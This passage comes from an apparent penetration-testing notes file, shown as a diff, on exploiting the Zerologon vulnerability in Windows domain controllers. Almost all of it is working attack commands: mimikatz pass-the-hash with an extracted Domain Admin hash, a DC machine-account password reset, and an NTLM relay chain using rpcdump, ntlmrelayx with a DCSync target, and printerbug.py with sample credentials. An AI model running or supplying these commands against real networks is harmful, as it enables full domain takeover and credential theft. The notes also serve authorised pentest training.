H3llKa1ser/B00t2R00t/CVE/Zerologon.md

 #### 5) sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN (Pass The Hash with the extracted Domain Admin hash)

 #### 6) lsadump::postzerologon /target:DC_IP /account:DC01$ (Reset password.
 Use IP address instead of FQDN to force NTLM with Windows APIs)

+### A 2nd approach to exploit zerologon is done by relaying authentication.

+## Prerequisites:

+ - A domain account

+ - One DC running the PrintSpooler service

+ - Another DC vulnerable to zerologon

+ - ntlmrelayx and any tool such as printerbug.py

+## Steps:

+#### 1) rpcdump.py 10.10.10.10 | grep -A 6 "spoolsv" (Check if one DC is running the PrintSpooler service)

+#### 2) ntlmrelayx.py -t dcsync://DOMAIN_CONTROLLER.LOCAL -smb2support (Setup ntlmrelay in one shell)

+#### 3) python3 printerbug.py 'DOMAIN.LOCAL'/joe:Password123@10.10.10.10 10.10.10.12 (Trigger printerbug in 2nd shell)